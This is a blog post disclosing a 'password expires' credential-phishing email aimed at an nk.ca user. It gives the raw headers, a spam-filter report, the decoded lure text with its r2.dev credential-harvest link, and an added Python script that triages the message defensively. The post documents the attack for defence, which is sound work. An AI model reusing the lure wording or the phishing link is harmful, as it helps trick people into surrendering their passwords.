Credential phish on nk.ca users from nuxt networks Germany and Krixe Pte in the Netherlands
Posted by Dave Yadallee on
Return-path:
Envelope-to: aboo@nk.ca
Delivery-date: Tue, 11 Jun 2024 09:08:00 -0600
Received: from [147.45.197.250] (port=41492 helo=t-rexbaby.co.jp)
by doctor.nl2k.ab.ca with esmtp (Exim 4.97.1 (FreeBSD))
(envelope-from)
id 1sH35i-000000008IN-01TH
for aboo@nk.ca;
Tue, 11 Jun 2024 09:07:23 -0600
Received: from [38.255.61.249] (localhost [IPv6:::1])
by t-rexbaby.co.jp (Postfix) with ESMTP id CD3183063E0
for; Tue, 11 Jun 2024 16:40:51 +0200 (CEST)
From: nk.ca
To: aboo@nk.ca
Subject: aboo@nk.ca Password expires notification
Date: 11 Jun 2024 16:40:51 +0200
Message-ID: <20240611164051.D94B24F974298CAF@daiya-tsusho.co.jp>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
X-Spam_score: 21.7
X-Spam_score_int: 217
X-Spam_bar: +++++++++++++++++++++
X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",
has identified this incoming email as possible spam. The original
message has been attached to this so you can view it or label
similar future email. If you have any questions, see
@@CONTACT_ADDRESS@@ for details.
Content preview: Dear aboo Your email aboo@nk.ca password expires today. Continue
with the same password below to avoid disconnection.
Content analysis details: (21.7 points, 5.0 required)
pts rule name description
---- ---------------------- --------------------------------------------------
1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org
[147.45.197.250 listed in dnsbl.ahbl.org]
[147.45.197.250 listed in dnsbl.ahbl.org]
[147.45.197.250 listed in dnsbl.ahbl.org]
[147.45.197.250 listed in dnsbl.ahbl.org]
1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org
[147.45.197.250 listed in dnsbl.ahbl.org]
0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org
[147.45.197.250 listed in dnsbl.ahbl.org]
0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org
[147.45.197.250 listed in dnsbl.ahbl.org]
0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org
[147.45.197.250 listed in dnsbl.ahbl.org]
1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
[147.45.197.250 listed in will-spam-for-food.eu.org]
1.9 URIBL_ABUSE_SURBL Contains an URL listed in the ABUSE SURBL blocklist
[URI: pub-04e98cff18e4472a81f25d74577167d2.r2.dev]
1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)
0.9 SPF_HELO_SOFTFAIL SPF: HELO does not match SPF record (softfail)
1.0 HK_RANDOM_FROM From username looks random
0.6 HK_RANDOM_ENVFROM Envelope sender username looks random
1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
0.0 HTML_MESSAGE BODY: HTML included in message
1.3 RDNS_NONE Delivered to internal network by a host with no rDNS
-0.0 T_SCC_BODY_TEXT_LINE No description available.
0.0 GOOG_REDIR_NORDNS Google redirect to obscure spamvertised website +
no rDNS
0.7 TO_NO_BRKTS_FROM_MSSP Multiple formatting errors
1.5 VOWEL_FROM_6 Impronouncable from header (6 consecutive vowels)
2.0 PDS_DBL_URL_TNB_RUNON Double-url and To no arrows, from runon
0.0 T_FROM_MISSP_DKIM From misspaced, DKIM dependable
0.1 TO_IN_SUBJ To address is in Subject
0.0 TO_NO_BRKTS_NORDNS_HTML To: misformatted and no rDNS and HTML only
1.7 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
2.4 RAZOR2_CF_RANGE_E8_51_100 Razor2 gives engine 8 confidence level
above 50%
[cf: 100]
0.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%
[cf: 100]
0.0 FSL_BULK_SIG Bulk signature with no Unsubscribe
Subject: {SPAM?} aboo@nk.ca Password expires notification
X-Antivirus: AVG (VPS 240611-2, 6/11/2024), Inbound message
X-Antivirus-Status: Clean
[HTML body, quoted-printable decoded; the inline style attributes that make up most of the raw text are omitted. The salutation name is styled green, the address red.]

Dear aboo

Your email aboo@nk.ca password expires today.
Continue with the same password below to avoid disconnection.

Link text: "Keep the same password"
href: https://pub-04e98cff18e4472a81f25d74577167d2.r2.dev/index.html#aboo@nk.ca
(target="_blank" rel="noopener noreferrer")
data-saferedirecturl: https://www.google.com/url?q=https://pub-04e98cff18e4472a81f25d74577167d2.r2.dev/index.html%23%5B%5B-Email-%5D%5D&source=gmail&ust=1718107626365000&usg=AOvVaw3hvrxNopdfFnu_T7hbiJMI
IT Support

This notification is assigned to aboo@nk.ca.
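The message above is raw and quoted-printable encoded, so the indicators worth keeping (the relay chain, the r2.dev landing page, and the victim address carried in the URL fragment) take some work to pull out by hand. The Python script below is an added example, not part of the original post. It embeds a constructed copy of the headers and HTML fragments shown above, reassembled into one well-formed message so it runs offline (the envelope-from, blank in the post's copy, is left out), and uses only the standard library. Two caveats it encodes: Postfix writes a Received line as "from HELO (client)", so for the inner hop the connecting client is localhost on t-rexbaby.co.jp and 38.255.61.249 is only what the submitting client claimed; and the data-saferedirecturl still carries the kit's unsubstituted `#[[-Email-]]` placeholder while the href has `#aboo@nk.ca` merged in, which is how the landing page learns the address to prefill without it ever appearing in the web server's logs.

```python
"""Added example (not from the post): triage the "password expires" phish above.
Parses the raw message, walks the Received chain, decodes the quoted-printable
HTML, unwraps Google's /url?q= redirect and reports what each link carries."""
import email
import html
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample: the headers and HTML fragments quoted in the post,
# reassembled into a minimal well-formed message so this runs offline.
# The envelope-from is blank in the post's copy and is simply left out.
SAMPLE = """\
Received: from [147.45.197.250] (port=41492 helo=t-rexbaby.co.jp)
    by doctor.nl2k.ab.ca with esmtp (Exim 4.97.1 (FreeBSD))
    id 1sH35i-000000008IN-01TH
    for aboo@nk.ca;
    Tue, 11 Jun 2024 09:07:23 -0600
Received: from [38.255.61.249] (localhost [IPv6:::1])
    by t-rexbaby.co.jp (Postfix) with ESMTP id CD3183063E0
    for <aboo@nk.ca>; Tue, 11 Jun 2024 16:40:51 +0200 (CEST)
From: nk.ca
To: aboo@nk.ca
Subject: aboo@nk.ca Password expires notification
Message-ID: <20240611164051.D94B24F974298CAF@daiya-tsusho.co.jp>
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
X-Spam_score: 21.7

<p>Dear <span style=3D"color: rgb(0, 128, 0);">aboo</span></p>
<p>Your email <span style=3D"color: rgb(255, 0, 0);">aboo@nk.ca</span> password expi=
res today. Continue with the same password below to avoid disconnection.</p>
<a href=3D"https://pub-04e98cff18e4472a81=
f25d74577167d2.r2.dev/index.html#aboo@nk.ca" target=3D"_blank"=20
data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://pub-04e98cff=
18e4472a81f25d74577167d2.r2.dev/index.html%23%5B%5B-Email-%5D%5D&source=
=3Dgmail&ust=3D1718107626365000&usg=3DAOvVaw3hvrxNopdfFnu_T7hbiJMI">Keep the same password</a>
<p>IT Support</p>
"""

RECEIVED = re.compile(r"from\s+(\S+)(?:\s+\(([^)]*)\))?.*?\bby\s+(\S+)")
LINK = re.compile(r'\b(href|data-saferedirecturl)\s*=\s*"([^"]+)"', re.I)

def received_chain(msg):
    """Hops oldest-first. Postfix writes 'from HELO (client)': for the inner hop
    the client is localhost, so 38.255.61.249 is a claimed name, not a peer."""
    hops = []
    for value in msg.get_all("Received", []):
        m = RECEIVED.search(" ".join(value.split()))  # unfold the header first
        if not m:
            continue
        detail = m.group(2) or ""
        helo = re.search(r"helo=(\S+)", detail)  # Exim records the HELO here
        hops.append({"from": m.group(1), "detail": detail, "by": m.group(3),
                     "helo": helo.group(1) if helo else ""})
    return hops[::-1]  # headers are prepended, so reversed order is chronological

def decoded_body(msg):
    """Undo the Content-Transfer-Encoding (quoted-printable here) and return the HTML."""
    raw = msg.get_payload(decode=True)
    return raw.decode(msg.get_content_charset() or "utf-8", "replace")

def unwrap_redirect(url):
    """Strip the https://www.google.com/url?q=<target> wrapper; other URLs pass through."""
    p = urlparse(url)
    if p.netloc.lower() == "www.google.com" and p.path == "/url":
        target = parse_qs(p.query).get("q")
        if target:
            return target[0]
    return url

def link_findings(body):
    """One record per href / data-saferedirecturl attribute in the HTML."""
    findings = []
    for attr, url in LINK.findall(body):
        url = html.unescape(url)
        target = unwrap_redirect(url)
        parts = urlparse(target)
        findings.append({"attr": attr.lower(), "host": parts.netloc,
                         # the fragment is never sent to the server; kits use it
                         # to hand the victim address to the page's JavaScript
                         "fragment": unquote(parts.fragment),
                         "wrapped": target != url})
    return findings

def triage(raw):
    msg = email.message_from_string(raw)
    body = decoded_body(msg)
    msgid = msg.get("Message-ID", "")
    return {
        "from_header": msg.get("From", ""),
        "message_id_domain": msgid.rsplit("@", 1)[-1].rstrip(">") if "@" in msgid else "",
        "spam_score": float(msg["X-Spam_score"]) if msg["X-Spam_score"] else None,
        "hops": received_chain(msg),
        "lure": re.search(r"password\s+expires", body, re.I) is not None,
        "links": link_findings(body),
    }

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Run it as-is to see the record for the sample, or feed `triage()` the text of a saved `.eml`. On this message it reports three domains that do not agree with each other (From says nk.ca, the Message-ID was minted at daiya-tsusho.co.jp, the HELO was t-rexbaby.co.jp), both links pointing at the same r2.dev bucket, and the placeholder-versus-merged fragment pair. When reading the SpamAssassin score in the post, discount the dnsbl.ahbl.org lines: AHBL shut its lists down in 2015 and the zone answers positively for every query, which is why the same address appears in every AHBL sub-list at once; the Razor2, SURBL, SPF and body-format rules carry the signal on their own.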